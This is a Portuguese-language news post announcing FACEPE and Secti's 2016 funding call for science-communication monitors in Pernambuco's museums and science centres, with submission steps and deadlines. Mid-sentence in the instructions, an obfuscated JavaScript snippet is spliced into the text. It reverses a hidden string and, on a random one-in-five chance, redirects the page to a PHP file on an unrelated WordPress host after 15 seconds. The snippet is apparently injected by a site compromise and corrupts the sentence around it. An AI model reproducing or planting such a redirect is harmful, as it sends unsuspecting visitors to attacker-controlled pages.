museus

 

A Fundação de Amparo à Ciência e Tecnologia do Estado de Pernambuco (FACEPE), em parceria com a Secretaria de Ciência, Tecnologia e Inovação de Pernambuco (Secti), lança a 5ª edição do edital “Apoio a Atividades de Monitoria em Divulgação Científica nos Museus e Centros de Ciência de Pernambuco”. O investimento é de aproximadamente R$ 432 mil e as propostas podem ser enviadas até o dia 17 de outubro de 2016.

Os Centros e Museus de Ciência, vinculados à instituições públicas e privadas sem fins lucrativos, federais, estaduais ou municipais, que realizam exposições ou atividades de divulgação das ciências já podem submeter os projetos para obtenção de apoio na forma de quotas de bolsas da modalidade Bolsa de Cooperação Técnica (BCT).

As propostas devem ser encaminhadas à FACEPE pelo coordenador institucional do projeto, por meio do preenchimento e envio do Formulário de Solicitação de Auxílio à Realização de Cursos e Reuniões Científicas (modalidade ARC), ao sistema da AgilFAP (htttp://agil.facepebr) até o dia 17/10/2016. Para chegar ao formulário no Sistema AgilFAP, dentro da modalidade “ARC,” o solicitante deverá cadastrar-se e em seguida se logar no sistema qu$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando, então, poderá selecionar no menu “Bolsas e Auxílios” a modalidade “ARC” e, por fim, a opção “Edital 16/2016 – Monitoria em Divulgação Científica”.

Além do envio do Formulário Eletrônico, a submissão da proposta requer também a entrega de Documentação Complementar impressa, como detalhado no edital, até o dia 18/10/2016.

A FACEPE e a Secti visam apoiar atividades de monitoria em divulgação científica que propiciem a instalação e o fortalecimento de espaços científico-culturais, como centros e museus de ciência, planetários, jardins zoobotânicos, parques de ciência e instituições similares, para promover a expansão e a melhoria de suas ações, além de aprimorar a divulgação e a popularização da cultura científico-tecnológica junto à sociedade."

Clique aqui e confira o edital